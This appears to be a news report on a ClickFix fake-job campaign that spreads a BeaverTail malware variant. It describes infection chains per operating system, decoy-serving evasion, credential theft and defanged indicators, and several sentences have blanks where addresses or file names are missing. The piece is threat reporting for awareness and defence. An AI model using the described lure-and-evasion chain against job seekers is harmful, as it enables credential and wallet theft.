Malicious repositories exploiting BeaverTail variant found to infiltrate organizations within the retail sector.
In a recent cybersecurity development, a sophisticated North Korean state-sponsored group known as APT37 (also called Reaper or ScarCruft) has been distributing an extended variant of BeaverTail malware since May 2025. The malware distribution infrastructure is centred around a fraudulent hiring website hosted at businesshire_.top, masquerading as a legitimate recruitment platform.
The group's modus operandi involves using fake job boards and ClickFix social engineering tactics. The malware has been compiled into standalone executables, enabling it to function on systems without standard development tools typically found on non-technical users' machines.
The script on Linux systems installs Node.js via the nvm-sh installer before downloading and executing a JavaScript version of BeaverTail. On macOS systems, the ClickFix command initiates by downloading a seemingly legitimate installer package named com.nvidiahpc.pkg. Windows infections involve the ClickFix command downloading containing multiple components, including a renamed 7zip executable and a VisualBasic launcher script.
The simplified BeaverTail variant on all platforms targets only eight browser extensions and omits dedicated data extraction functions for browsers beyond Chrome. This campaign targets marketing professionals, cryptocurrency traders, and retail sector personnel, marking a shift from traditional software developer targets.
The site offers positions including cryptocurrency trader roles at four web3 organisations and sales or marketing roles at three web3 companies and a US-based e-commerce retailer. Job seekers encounter fabricated technical errors during the fake application process, requiring them to execute malicious system commands as troubleshooting steps.
The malware has been identified through infrastructure analysis by GitLab analysts. They discovered that the threat actor's backend service hosted at remains active as of publication. Command and control communications utilize the IP address 172.86.93_.139 with 'tttttt' serving as the campaign identifier across all infected systems.
Authentic infection attempts using headers like '203' trigger the deployment of actual BeaverTail payloads, while requests without proper headers receive archives containing benign VisualBasic scripts and legitimate, signed Nvidia Broadcast executables. The malware on macOS exhibits intelligent redundancy mechanisms, executing the InvisibleFerret binary only when Python 3 is unavailable.
The threat actors have implemented sophisticated evasion mechanisms throughout their infrastructure. For instance, the malicious service employs dynamic user agent header verification, responding with legitimate decoy payloads when accessed without specific numeric headers.
On Linux systems, malicious scripts are delivered directly through and piped into bash execution. On macOS, the infection chain proceeds through the execution of , which retrieves two unsigned Mach-O binaries: and . The script contained in the package attempts to exfiltrate stored passwords from the non-standard file location.
GitLab analysts have been following this campaign closely and have identified the Command and Control server hosting the malware. They advise users to be vigilant when applying for jobs online and to ensure their systems are protected with updated antivirus software.
Read also:
- Cyber Attack Nets $14 Million from WOO X Across Four Different Blockchains
- Auto industry giants Fescaro and TUV Nord team up for cybersecurity certification in automobiles
- Nigerian Securities and Exchange Commission (SEC) teams up with Chainalysis to combat cryptocurrency fraud activities
- International marketing firm We Are Social intensifies global strategy for gaming industry
